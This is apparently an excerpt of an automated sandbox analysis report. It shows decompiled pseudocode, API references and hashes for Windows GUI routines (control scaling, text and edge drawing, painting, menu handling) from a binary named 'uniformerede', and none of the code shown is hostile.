                                                                                                                                                                                                                            0x004155d5
                                                                                                                                                                                                                            0x004155d6
                                                                                                                                                                                                                            0x004155dd
                                                                                                                                                                                                                            0x004155de
                                                                                                                                                                                                                            0x004155e3
                                                                                                                                                                                                                            0x004155e6
                                                                                                                                                                                                                            0x004155e9
                                                                                                                                                                                                                            0x004155f3
                                                                                                                                                                                                                            0x00415600
                                                                                                                                                                                                                            0x00415602
                                                                                                                                                                                                                            0x00415602
                                                                                                                                                                                                                            0x00415616
                                                                                                                                                                                                                            0x0041561b
                                                                                                                                                                                                                            0x0041561e
                                                                                                                                                                                                                            0x00415621
                                                                                                                                                                                                                            0x0041562e
                                                                                                                                                                                                                            0x0041562e
                                                                                                                                                                                                                            0x004155d0
                                                                                                                                                                                                                            0x0041547a
                                                                                                                                                                                                                            0x0041548a
                                                                                                                                                                                                                            0x00415499
                                                                                                                                                                                                                            0x004154aa
                                                                                                                                                                                                                            0x00415535
                                                                                                                                                                                                                            0x00415536
                                                                                                                                                                                                                            0x0041553d
                                                                                                                                                                                                                            0x0041553e
                                                                                                                                                                                                                            0x00415543
                                                                                                                                                                                                                            0x00415546
                                                                                                                                                                                                                            0x0041554c
                                                                                                                                                                                                                            0x00415555
                                                                                                                                                                                                                            0x00415564
                                                                                                                                                                                                                            0x00415566
                                                                                                                                                                                                                            0x00415566
                                                                                                                                                                                                                            0x00415574
                                                                                                                                                                                                                            0x0041557b
                                                                                                                                                                                                                            0x0041557e
                                                                                                                                                                                                                            0x00415581
                                                                                                                                                                                                                            0x0041558e
                                                                                                                                                                                                                            0x004154b0
                                                                                                                                                                                                                            0x004154ba
                                                                                                                                                                                                                            0x0041552a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004154bc
                                                                                                                                                                                                                            0x004154bf
                                                                                                                                                                                                                            0x004154c0
                                                                                                                                                                                                                            0x004154c7
                                                                                                                                                                                                                            0x004154c8
                                                                                                                                                                                                                            0x004154cd
                                                                                                                                                                                                                            0x004154d0
                                                                                                                                                                                                                            0x004154d3
                                                                                                                                                                                                                            0x004154dd
                                                                                                                                                                                                                            0x004154e8
                                                                                                                                                                                                                            0x004154f7
                                                                                                                                                                                                                            0x004154f9
                                                                                                                                                                                                                            0x004154f9
                                                                                                                                                                                                                            0x00415500
                                                                                                                                                                                                                            0x00415503
                                                                                                                                                                                                                            0x00415506
                                                                                                                                                                                                                            0x00415513
                                                                                                                                                                                                                            0x00415513
                                                                                                                                                                                                                            0x004154ba
                                                                                                                                                                                                                            0x0041548c
                                                                                                                                                                                                                            0x0041548c
                                                                                                                                                                                                                            0x00415799
                                                                                                                                                                                                                            0x0041579d
                                                                                                                                                                                                                            0x0041579d
                                                                                                                                                                                                                            0x0041548a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004154C0
                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004155D6
                                                                                                                                                                                                                              • Part of subcall function 0041713C: RtlEnterCriticalSection.KERNEL32(0049E828,?,?,?,00000000,?,00416D60,00000000,00416E06,?,?,?,?,?,004101DF,00000000), ref: 00417172
                                                                                                                                                                                                                              • Part of subcall function 0041713C: RtlLeaveCriticalSection.KERNEL32(0049E828,004171EB,?,0049E828,?,?,?,00000000,?,00416D60,00000000,00416E06), ref: 004171DE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalInitSectionVariant$EnterLeave
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2777075435-0
                                                                                                                                                                                                                            • Opcode ID: 911dfcfbc7a12d5b52f32f0e07c108f6710307d6a7d9ba3bae60d823c04f13e4
                                                                                                                                                                                                                            • Instruction ID: a24615229599b446cf83ad5ef8fc14772df329521493faa61475ffe7701a7f51
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 911dfcfbc7a12d5b52f32f0e07c108f6710307d6a7d9ba3bae60d823c04f13e4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8B16D79A00609EFDB00EF94C5818EDB7B5FF89714F9040A6E804A7751D738AEC5CB68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E004534EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				signed char _t92;
                                                                                                                                                                                                                            				int _t98;
                                                                                                                                                                                                                            				int _t100;
                                                                                                                                                                                                                            				intOrPtr _t117;
                                                                                                                                                                                                                            				int _t122;
                                                                                                                                                                                                                            				intOrPtr _t155;
                                                                                                                                                                                                                            				void* _t164;
                                                                                                                                                                                                                            				signed char _t180;
                                                                                                                                                                                                                            				intOrPtr _t182;
                                                                                                                                                                                                                            				intOrPtr _t194;
                                                                                                                                                                                                                            				int _t199;
                                                                                                                                                                                                                            				intOrPtr _t203;
                                                                                                                                                                                                                            				void* _t204;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t204 = __eflags;
                                                                                                                                                                                                                            				_t196 = __edi;
                                                                                                                                                                                                                            				_t202 = _t203;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E0043DF9C(_v8);
                                                                                                                                                                                                                            				_push(_t203);
                                                                                                                                                                                                                            				_push(0x453742);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t203;
                                                                                                                                                                                                                            				 *(_v8 + 0x268) = 0;
                                                                                                                                                                                                                            				 *(_v8 + 0x26c) = 0;
                                                                                                                                                                                                                            				 *(_v8 + 0x270) = 0;
                                                                                                                                                                                                                            				_t164 = 0;
                                                                                                                                                                                                                            				_t92 =  *0x49e665; // 0x0
                                                                                                                                                                                                                            				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
                                                                                                                                                                                                                            				E0043D6F8(_v8, 0, __edx, _t204);
                                                                                                                                                                                                                            				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                            					_t98 =  *(_v8 + 0x268);
                                                                                                                                                                                                                            					_t213 = _t98;
                                                                                                                                                                                                                            					if(_t98 > 0) {
                                                                                                                                                                                                                            						E0043A998(_v8, _t98, _t196, _t213);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t100 =  *(_v8 + 0x26c);
                                                                                                                                                                                                                            					_t214 = _t100;
                                                                                                                                                                                                                            					if(_t100 > 0) {
                                                                                                                                                                                                                            						E0043A9DC(_v8, _t100, _t196, _t214);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t180 =  *0x453750; // 0x0
                                                                                                                                                                                                                            					 *(_v8 + 0x98) = _t180;
                                                                                                                                                                                                                            					_t215 = _t164;
                                                                                                                                                                                                                            					if(_t164 == 0) {
                                                                                                                                                                                                                            						E00452B4C(_v8, 1, 1);
                                                                                                                                                                                                                            						E004411C8(_v8, 1, 1, _t215);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0043C130(_v8, 0, 0xb03d, 0);
                                                                                                                                                                                                                            					_pop(_t182);
                                                                                                                                                                                                                            					 *[fs:eax] = _t182;
                                                                                                                                                                                                                            					_push(0x453749);
                                                                                                                                                                                                                            					return E0043DFA4(_v8);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                                                                                                                                                                                                                            						_t194 =  *0x49ebbc; // 0x0
                                                                                                                                                                                                                            						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
                                                                                                                                                                                                                            							_t155 =  *0x49ebbc; // 0x0
                                                                                                                                                                                                                            							E00424FF8( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00424FF0( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t117 =  *0x49ebbc; // 0x0
                                                                                                                                                                                                                            					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
                                                                                                                                                                                                                            					_t199 = E00453874(_v8);
                                                                                                                                                                                                                            					_t122 =  *(_v8 + 0x270);
                                                                                                                                                                                                                            					_t209 = _t199 - _t122;
                                                                                                                                                                                                                            					if(_t199 != _t122) {
                                                                                                                                                                                                                            						_t164 = 1;
                                                                                                                                                                                                                            						E00452B4C(_v8, _t122, _t199);
                                                                                                                                                                                                                            						E004411C8(_v8,  *(_v8 + 0x270), _t199, _t209);
                                                                                                                                                                                                                            						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                                                                                                                                                                                                                            							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                                                                                                                                                                                                                            							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
                                                                                                                                                                                                                            							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
                                                                                                                                                                                                                            							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                            0x00453601
                                                                                                                                                                                                                            0x00453610
                                                                                                                                                                                                                            0x0045362f
                                                                                                                                                                                                                            0x0045362f
                                                                                                                                                                                                                            0x0045363f
                                                                                                                                                                                                                            0x0045365e
                                                                                                                                                                                                                            0x0045365e
                                                                                                                                                                                                                            0x0045366e
                                                                                                                                                                                                                            0x0045368d
                                                                                                                                                                                                                            0x004536b0
                                                                                                                                                                                                                            0x004536b0
                                                                                                                                                                                                                            0x0045366e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004535df

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,?,00000000), ref: 004535AB
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453627
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453656
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453685
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 004536A8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0044AF00(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				struct tagRECT _v32;
                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                            				int _t89;
                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                            				int _t117;
                                                                                                                                                                                                                            				intOrPtr _t127;
                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                            				void* _t144;
                                                                                                                                                                                                                            				char _t153;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t120 = __ecx;
                                                                                                                                                                                                                            				_t143 = _t144;
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_v12 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t139 = __eax;
                                                                                                                                                                                                                            				_t117 = _a4;
                                                                                                                                                                                                                            				_push(_t144);
                                                                                                                                                                                                                            				_push(0x44b0e4);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t144 + 0xffffffe4;
                                                                                                                                                                                                                            				_t53 = E0044CE98(__eax);
                                                                                                                                                                                                                            				_t135 = _t53;
                                                                                                                                                                                                                            				if(_t53 != 0 && E0044E4D4(_t135) != 0) {
                                                                                                                                                                                                                            					if((_t117 & 0x00000000) != 0) {
                                                                                                                                                                                                                            						__eflags = (_t117 & 0x00000002) - 2;
                                                                                                                                                                                                                            						if((_t117 & 0x00000002) == 2) {
                                                                                                                                                                                                                            							_t117 = _t117 & 0xfffffffd;
                                                                                                                                                                                                                            							__eflags = _t117;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t117 = _t117 & 0xffffffff | 0x00000002;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t117 = _t117 | 0x00020000;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00404A58( &_v16, _v12);
                                                                                                                                                                                                                            				if((_t117 & 0x00000004) == 0) {
                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                            					E00404DCC(_v16, 0x44b108);
                                                                                                                                                                                                                            					if(_t153 != 0) {
                                                                                                                                                                                                                            						E004256F8( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
                                                                                                                                                                                                                            						__eflags =  *((char*)(_t139 + 0x3a));
                                                                                                                                                                                                                            						if( *((char*)(_t139 + 0x3a)) != 0) {
                                                                                                                                                                                                                            							_t136 =  *((intOrPtr*)(_v8 + 0xc));
                                                                                                                                                                                                                            							__eflags = E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c;
                                                                                                                                                                                                                            							E004250DC( *((intOrPtr*)(_v8 + 0xc)), E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c, _t136, _t139, _t143);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags =  *((char*)(_t139 + 0x39));
                                                                                                                                                                                                                            						if( *((char*)(_t139 + 0x39)) != 0) {
                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                            							_t63 = E00404C80(_v16);
                                                                                                                                                                                                                            							_t65 = E00404E80(_v16);
                                                                                                                                                                                                                            							DrawTextA(E00425C68(_v8), _t65, _t63, _a12, _t117);
                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                            							_pop(_t127);
                                                                                                                                                                                                                            							 *[fs:eax] = _t127;
                                                                                                                                                                                                                            							_push(0x44b0eb);
                                                                                                                                                                                                                            							return E004049C0( &_v16);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							__eflags = _a8;
                                                                                                                                                                                                                            							if(_a8 == 0) {
                                                                                                                                                                                                                            								OffsetRect(_a12, 1, 1);
                                                                                                                                                                                                                            								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                                                                                                                                                                                                                            								_t89 = E00404C80(_v16);
                                                                                                                                                                                                                            								_t91 = E00404E80(_v16);
                                                                                                                                                                                                                            								DrawTextA(E00425C68(_v8), _t91, _t89, _a12, _t117);
                                                                                                                                                                                                                            								OffsetRect(_a12, 0xffffffff, 0xffffffff);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _a8;
                                                                                                                                                                                                                            							if(_a8 == 0) {
                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                            								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t76 = E00424950(0xff00000d);
                                                                                                                                                                                                                            								_t78 = E00424950(0xff000010);
                                                                                                                                                                                                                            								__eflags = _t76 - _t78;
                                                                                                                                                                                                                            								if(_t76 != _t78) {
                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L24;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if((_t117 & 0x00000004) == 0) {
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						_v32.top = _v32.top + 4;
                                                                                                                                                                                                                            						DrawEdge(E00425C68(_v8),  &_v32, 6, 2);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(_v16 == 0) {
                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                            						E00404C88( &_v16, 0x44b0fc);
                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *_v16 != 0x26) {
                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t153 =  *((char*)(_v16 + 1));
                                                                                                                                                                                                                            					if(_t153 != 0) {
                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0044AFCF
                                                                                                                                                                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 0044B020
                                                                                                                                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B055
                                                                                                                                                                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044B062
                                                                                                                                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B0C9
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Draw$OffsetRectText$Edge
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3610532707-0
                                                                                                                                                                                                                            • Opcode ID: 18493c12ef401e963272a7311625c849f2c9f643628862a87cd9f04e99074c40
                                                                                                                                                                                                                            • Instruction ID: ea5abe3bfc9a9df89051e6d8e73c4225462b89b626b3e2b5561302bed16b813c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18493c12ef401e963272a7311625c849f2c9f643628862a87cd9f04e99074c40
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C551A3B0A04204AFEB10EBA9D881B9F73E5EF44324F55856BF924A7381C73CED048B59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0043F3B8(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                            				int _v20;
                                                                                                                                                                                                                            				struct tagPAINTSTRUCT _v84;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				void* _t64;
                                                                                                                                                                                                                            				struct HDC__* _t75;
                                                                                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                            				void* _t101;
                                                                                                                                                                                                                            				intOrPtr _t102;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t100 = _t101;
                                                                                                                                                                                                                            				_t102 = _t101 + 0xffffffb0;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t75 =  *(_v12 + 4);
                                                                                                                                                                                                                            				if(_t75 == 0) {
                                                                                                                                                                                                                            					_t75 = BeginPaint(E00441704(_v8),  &_v84);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(_t100);
                                                                                                                                                                                                                            				_push(0x43f4d8);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t102;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
                                                                                                                                                                                                                            					_v20 = SaveDC(_t75);
                                                                                                                                                                                                                            					_v16 = 2;
                                                                                                                                                                                                                            					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
                                                                                                                                                                                                                            					if(_t95 >= 0) {
                                                                                                                                                                                                                            						_t96 = _t95 + 1;
                                                                                                                                                                                                                            						_t98 = 0;
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							_t64 = E0041AC6C( *((intOrPtr*)(_v8 + 0x198)), _t98);
                                                                                                                                                                                                                            							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
                                                                                                                                                                                                                            								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
                                                                                                                                                                                                                            									goto L11;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
                                                                                                                                                                                                                            									if(_v16 != 1) {
                                                                                                                                                                                                                            										goto L11;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                            							L11:
                                                                                                                                                                                                                            							_t98 = _t98 + 1;
                                                                                                                                                                                                                            							_t96 = _t96 - 1;
                                                                                                                                                                                                                            						} while (_t96 != 0);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                            					if(_v16 != 1) {
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v8 + 0xb8))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					RestoreDC(_t75, _v20);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_v8 + 0xb8))();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E0043F510(_v8, 0, _t75);
                                                                                                                                                                                                                            				_pop(_t84);
                                                                                                                                                                                                                            				 *[fs:eax] = _t84;
                                                                                                                                                                                                                            				_push(0x43f4df);
                                                                                                                                                                                                                            				_t55 = _v12;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t55 + 4)) == 0) {
                                                                                                                                                                                                                            					return EndPaint(E00441704(_v8),  &_v84);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t55;
                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                            0x0043f493
                                                                                                                                                                                                                            0x0043f49e
                                                                                                                                                                                                                            0x0043f3ff
                                                                                                                                                                                                                            0x0043f406
                                                                                                                                                                                                                            0x0043f406
                                                                                                                                                                                                                            0x0043f4aa
                                                                                                                                                                                                                            0x0043f4b1
                                                                                                                                                                                                                            0x0043f4b4
                                                                                                                                                                                                                            0x0043f4b7
                                                                                                                                                                                                                            0x0043f4bc
                                                                                                                                                                                                                            0x0043f4c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f4d2
                                                                                                                                                                                                                            0x0043f4d7

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • BeginPaint.USER32(00000000,?), ref: 0043F3DE
                                                                                                                                                                                                                            • SaveDC.GDI32(?), ref: 0043F412
                                                                                                                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043F474
                                                                                                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 0043F49E
                                                                                                                                                                                                                            • EndPaint.USER32(00000000,?,0043F4DF), ref: 0043F4D2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3808407030-0
                                                                                                                                                                                                                            • Opcode ID: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                                                                                                                                                                                            • Instruction ID: 9443a4bcddcea103c83dcf0c2b69b8a33cb36b1669e9c3c4d5886d405921b8f2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA415070E00208AFC700DB99C984EAFB7F9AF58318F5490BAE90497362D739AE45CB54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0044AD40(int __eax, void* __edx) {
                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                            				intOrPtr _t44;
                                                                                                                                                                                                                            				int _t46;
                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                            				intOrPtr* _t48;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t18 = __eax;
                                                                                                                                                                                                                            				_t48 = __eax;
                                                                                                                                                                                                                            				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                                                                                                                                                                                                                            					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                                                                                                                                                                                                                            						 *((char*)(__eax + 0x74)) = 1;
                                                                                                                                                                                                                            						return __eax;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                                                                                                                                                                                                                            						return E0044AD40(_t19, __edx);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t18 = GetMenuItemCount(E0044AE70(__eax));
                                                                                                                                                                                                                            					_t47 = _t18;
                                                                                                                                                                                                                            					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
                                                                                                                                                                                                                            					while(_t47 > 0) {
                                                                                                                                                                                                                            						_t46 = _t47 - 1;
